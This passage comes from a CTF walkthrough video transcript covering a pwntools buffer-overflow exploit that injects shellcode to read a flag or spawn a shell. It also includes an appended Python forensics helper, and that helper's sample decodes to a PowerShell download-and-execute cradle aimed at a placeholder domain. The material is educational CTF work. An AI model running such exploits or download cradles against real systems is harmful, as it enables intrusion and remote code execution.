Essentially what we're doing is building up a shellcode, and then our payload. This time we're going to say that we want to overwrite the return address at 72 bytes in, and the address we're overwriting it with is the stack address that's been leaked to us, which is pointing to the beginning of the buffer, and in the buffer we're going to put some padding and some shellcode. This can go in any order, so we could also do this as well; we just need to make sure there's enough space between the shellcode and the padding to make it up to the stack address. So you can see here we're calculating the padding based on some NOP (no operation) instructions, but this could just as easily be some A's, as is often used for buffer overflows, and then we're doing minus the length of the shellcode, so as we modify our shellcode here it won't break our payload. I'm just going to put that back the way it was. That's about it; we should be able to try and run this. Let's do python exploit.py and try to run it. We've got debug mode on so we can see a lot of stuff coming backwards and forwards, which is good because we've run into a problem whereby it hasn't found our leaked stack address. The reason being the payload I had in was just going to grab a line and grab the stack address from it, and whenever we actually run the program it's on the second line that we get our stack value leaked to us. So let's just insert another io.recvline(). Let's try that again: nope. Let's try the exploit again, and this time you can see it's compiled our shellcode out of the cat flag.txt; that's the shellcode that's going to execute to print it out. And where was the stack address leaked? Oh, here it is. Okay, so there's the stack address that was leaked; that's looking good as well.

The only thing is it didn't actually work here, but if we go and test this out on the server, which we can do quite easily using this template, just type in remote here and paste that in. If we run it against the remote server, I believe we'll get back... no, we didn't get back our flag. Okay, let me actually try, instead of receiving the flag (I don't know if the flag's the first thing to come back), let's just change this to io.interactive(). Try that again. Okay, that time it comes back with a flag. So because it was receiving two lines, actually... let me do that again. Let's go back and try and make this neat and tidy. In fact, just before we do that, let's just show that when we have it set to io.interactive() we can use this to get a shell as well. So instead of doing cat flag.txt, let's comment that out and do shellcraft.sh. By the way, the reason we don't have to specify whether it's x86 or x64 and things like that here is because we've got our context set here, so it knows what architecture the binary is. So that's that with a shell; let's try and run it, and you can see it said unfortunately sleigh cannot be repaired, but we don't get an end of file error. So if we try and list, try and do id, try and cat our flag.txt, we see that we've got a shell. But let's go back and change that to cat flag.txt and let's use this flag. Let's take out the io.interactive() and just add in io.recvline() here to make up for that extra line. Try that again, and we still don't get a flag. Let's try recvlines(2). Try it again. Okay, we did get a line there, but we're still getting some error. All right, forget it; it's probably something to do with the new pwntools and all these errors you get to do with bytes and stuff. So instead I'll just do io.interactive() there, just to make that a bit cleaner. There should be some other ways to do this as well. I think Superhero1 recently did the Bat Computer challenge using some short shellcode, maybe with a shellcode you can get online, like a 22 or 23 byte shellcode. There's probably some other ways as well, but we've got a flag anyway.

That'll do it for this one, and that's going to wrap it up for the day two challenges. So we've been through the challenges in order of the difficulty, well, in order of the number of solves, not necessarily the difficulty, and this might change about a little bit. But yeah, I hope you've enjoyed the video. If you have any questions or comments, leave them down below. Thanks.
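The Honeypot workflow described above (decoding the powershell.exe encoded command, picking the attacker's connection out of netscan, and hashing the three answers into the flag) as a worked example added here; this is not the video's code. The script, the example.invalid domain, the addresses and the netscan rows are all constructed, and the flag format follows what the video describes.

```python
import base64
import hashlib
import re

# Constructed sample in the shape of the "-EncodedCommand" argument seen in
# the powershell.exe command line. PowerShell base64-encodes the script as
# UTF-16LE, which is why a plain base64 decode shows a "dot" (NUL byte)
# after every character. Hypothetical domain, not the one from the challenge.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/update.ps1')"
ENCODED_COMMAND = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand value (base64 of UTF-16LE text)."""
    return base64.b64decode(b64).decode("utf-16-le")


def decode_by_stripping_nuls(b64: str) -> str:
    """What the 'replace the dots with nothing' step does: drop the NUL bytes
    instead of decoding UTF-16LE. Gives the same result for ASCII scripts."""
    return base64.b64decode(b64).replace(b"\x00", b"").decode("ascii")


URL_RE = re.compile(r"https?://[^\s'\"()]+")


def extract_urls(script: str) -> list:
    """Pull download URLs out of a decoded script."""
    return URL_RE.findall(script)


# Constructed rows in the layout of volatility 2 netscan output:
# Offset Proto LocalAddr ForeignAddr State Pid Owner (trailing columns such
# as Created are ignored by the parser). Addresses are made up.
NETSCAN_OUTPUT = """\
0x3e1a2b00 TCPv4 192.168.56.101:49160 192.168.56.1:4444 ESTABLISHED 2700 powershell.exe
0x3e1b3c10 TCPv4 192.168.56.101:49161 198.51.100.7:80 ESTABLISHED 1180 iexplore.exe
0x3e1c4d20 TCPv4 0.0.0.0:135 0.0.0.0:0 LISTENING 664 svchost.exe
"""

# 4444 is the default Meterpreter/msfvenom reverse port mentioned in the video.
SUSPICIOUS_PORTS = {4444}


def parse_netscan(text: str) -> list:
    """Parse netscan rows into dicts; lines that do not fit the layout are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7 or not parts[1].startswith("TCP"):
            continue
        foreign_ip, foreign_port = parts[3].rsplit(":", 1)
        rows.append({
            "foreign_ip": foreign_ip,
            "foreign_port": int(foreign_port),
            "state": parts[4],
            "pid": int(parts[5]),
            "owner": parts[6],
        })
    return rows


def find_c2_candidates(rows: list) -> list:
    """Established connections to a known-bad port: attacker IP plus the process."""
    return [r for r in rows
            if r["state"] == "ESTABLISHED" and r["foreign_port"] in SUSPICIOUS_PORTS]


def build_flag(url: str, pid: int, ip: str) -> str:
    """HTB{md5(url_pid_ip)} with no trailing newline, like `echo -n ... | md5sum`."""
    digest = hashlib.md5(f"{url}_{pid}_{ip}".encode()).hexdigest()
    return "HTB{" + digest + "}"
```

Chaining the pieces gives `build_flag(extract_urls(decode_encoded_command(ENCODED_COMMAND))[0], hit["pid"], hit["foreign_ip"])` for the single `hit` returned by `find_c2_candidates`.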
Info
Channel: CryptoCat
Views: 1,633
Keywords: Cyber Santa, HackTheBox, Hack The Box, HTB, Capture The Flag, CTF, base64, PCAP, Wireshark, traffic analysis, APT, SQLMap, SQLi, blind sql, Affine, known-plaintext, UPX, packed binary, buffer overflow, ret2win, binary exploitation, pwn, exploit, pwntools, pwndbg, GDB, checksec, canary, PIE, GOT, libc, python, strace, ltrace, debugging, static analyis, dynamic analysis, offsec, radare, r2, crypto, reversing, forensics, DFIR, ethical hacking, web exploit, pentesting, pen-test, bug bounty, writeup, cyberchef, GCHQ, IDA, xmas
Id: deg0CQwwN-M
Length: 60min 59sec (3659 seconds)
Published: Mon Dec 06 2021